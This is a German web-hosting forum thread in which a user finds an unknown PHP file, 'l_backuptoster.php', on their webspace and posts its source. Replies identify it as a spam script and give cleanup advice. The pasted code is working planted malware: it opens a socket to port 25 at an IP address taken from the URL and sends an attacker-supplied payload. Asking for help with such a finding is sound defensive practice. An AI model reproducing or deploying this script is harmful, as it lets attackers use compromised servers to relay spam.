L_backuptoster.php?

Hallo Leute,

hab gerade auf meinem webspace die Datei “l_backuptoster.php” im root gesehen… die habe nicht ich erstellt…gehört die zum system oder muss ich mir sorgen machen? :astonished:

Inhalt:

[code]

<?php ignore_user_abort(true); set_time_limit (0); ini_set('max_execution_time',0); error_reporting(0); getmxrr("google.com" , $hostes); if(isset($_GET[id]) && isset($_GET[ipAddr])) { //$sock = fsockopen($_GET[ipAddr], 8000); //if(!$sock) //{ $sock = fsockopen($_GET[ipAddr], 25); if(!$sock) { echo "socket_failed"; return false; } // } if(!fwrite($sock, $_GET[id])) { fclose($sock); return false; } fclose($sock); } ?> [/code]

mfg

Hi,

also zum System gehört die glaube ich wohl eher nicht.
Aber falls dein Space bei bplaced ist dürfte da eh nichts funktionieren da fsockopen eigentlich deaktiviert ist soweit ich das weiß.
Verwendest du ein CMS? Wenn ja kommt sie vielleicht davon.

Wenn ich irgendwo falsch liege bitte korigieren!(abgesehen von Rechtschreibfehlern :smiley: )

Gruß Nikolas

Seltsam…
http://www.google.ch/search?hl=de&q=“l_backuptoster.php” (Bitte vorsichtig mit den Links! - “Diese Website kann Ihren Computer beschädigen.”)

ich an deiner Stelle würde PW etc. vom Account ändern :wink: (komplett, bplaced, FTP, MySQL)
Das Ding macht zwar soweit nichts schlimmes, jedoch könnte es vielleicht für (D)DoS genutzt werden^^ Lösche die Datei, ändere PW’s und hoffe das, das net noch ma passiert… und update die Software’s die du nutzt… CMS etc… Könnte durch eine Sicherheitslücke dort gelandet sein.

ist wahrscheinlich der Fall. Wir haben recht viele solcher Dateien oder auch Weiterleitungen, beispielsweise zu Seiten mit Inhalt für Erwachsene-only, die ausschließlich durch irgendwelche Sicherheitslücken veralteter CMS- oder Forenversionen auf dem Webspace gelandet sind. Folge ist eine Kontensperrung, da bei sowas meist Abusemeldungen reingehen und der Benutzer hier verpflichtet ist, sein Konto sicher zu halten, was auch den aktuellen Stand der verwendeten Software angeht, daher bitte das Thema durchgehend ernst nehmen.

ciao

zu einem verwend ich cms2day, welches sich im wartungsmodus befindet. und ich erstell gerade ein eigenes cms… hoffe, ich hab da keine lücke übersehen :smoke:

datei wurde gelöscht…

EDIT: natürlich miro, mach ich! cms2day liegt im root. mein cms ist in einem unterzeichnis - glaub nicht das es durch mein cms ensteht…

backuptoster ist ein Spamskript. Die Sicherheitslücke ist hier wohl der Benutzer selbst.
In aller Regel gelangen dise Skripte über geklaute Passworte auf die Server. Prüfe unbedingt alle lokalen Systeme, die Zugriff auf die relevanten Zugänge haben, auf Trojaner und Keylogger! Und trenne die Kisten am besten vom Netz, bevor sie weiteren Schaden anrichten!